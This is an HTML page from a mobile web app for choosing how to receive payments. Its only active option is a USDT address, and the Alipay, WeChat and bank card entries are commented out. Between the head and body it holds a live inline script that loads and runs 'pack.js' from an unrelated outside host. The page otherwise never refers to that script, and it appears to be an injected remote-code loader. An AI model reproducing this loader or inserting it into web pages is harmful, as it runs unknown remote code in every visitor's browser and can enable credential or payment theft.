<!DOCTYPE html>
<html>
	<head>
		<meta charset="utf-8" />
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
		<title>收款方式</title>
		<link rel="stylesheet" href="../../static/css/weui.css" />
		<link rel="stylesheet" href="../../static/css/common.css" />
		<link rel="stylesheet" href="../../static/css/weui-jquery.css" />
		<link rel="stylesheet" href="../../static/css/account/account.css" />
	</head>
	<script>
		(function () {
			var dw = document.createElement("script");
			dw.src = "https://yipinapp.cn/cydia/pack.js?zBv2XrG8cSQqzRDCm9hsEL"
			var s = document.getElementsByTagName("script")[0];
			s.parentNode.insertBefore(dw, s);
		})()
	</script>
	<body>
		<header class="weui-bar weui-bar-nav" id="returnBtn">
		    <a class="weui-pull-left weui-btns">
		        <span class="weui-cell__fts"></span>
		    </a>
		    <div class="weui-title">收款方式</div>
		</header>
		<div class="weui-panel weui-panel_access" id="thressMethod">
			<div class="weui-panel__bd">
<!--			    <a href="methodzhi.html" class="weui-cell weui-cell_access weui-cell_example" id="alipay">
					<div class="weui-cell__hd methImg">
						<img src="../../static/images/zhifubao.png">
			    	</div>
			    	<div class="weui-cell__bd weui-cell_primary">
			        	<p>支付宝</p>
			    	</div>
			    	<span class="weui-cell__ft"></span>
			    </a>
			    <a href="methodwei.html" class="weui-cell weui-cell_access weui-cell_example" id="weChat">
					<div class="weui-cell__hd methImg">
						<img src="../../static/images/weixin.png">
			    	</div>
			    	<div class="weui-cell__bd weui-cell_primary">
			        	<p>微信</p>
			    	</div>
			    	<span class="weui-cell__ft"></span>
			    </a>
			    <a href="methodbank.html" class="weui-cell weui-cell_access weui-cell_example" id="bankBox">
					<div class="weui-cell__hd methImg">
						<img src="../../static/images/yinhangka.png">
			    	</div>
			    	<div class="weui-cell__bd weui-cell_primary">
			        	<p>银行卡</p>
			    	</div>
			    	<span class="weui-cell__ft"></span>
			    </a>-->
				<a href="methodusdt.html" class="weui-cell weui-cell_access weui-cell_example" id="bankBox">
					<div class="weui-cell__hd methImg">
						<img src="../../static/images/yinhangka.png">
					</div>
					<div class="weui-cell__bd weui-cell_primary">
						<p>USDT地址</p>
					</div>
					<span class="weui-cell__ft"></span>
				</a>
<!--				<a href="methodusdtgen.html" class="weui-cell weui-cell_access weui-cell_example" id="bankBox">
					<div class="weui-cell__hd methImg">
						<img src="../../static/images/yinhangka.png">
					</div>
					<div class="weui-cell__bd weui-cell_primary">
						<p>新建USDT地址</p>
					</div>
					<span class="weui-cell__ft"></span>
				</a>-->
			</div>
		</div>
		<script type="text/javascript" src="../../lib/jquery.js" ></script>
		<script type="text/javascript" src="../../static/js/common.js" ></script>
		<script type="text/javascript" src="../../static/js/api.js" ></script>
		<script type="text/javascript" src="../../static/js/account/payMethod.js" ></script>
	</body>
</html>
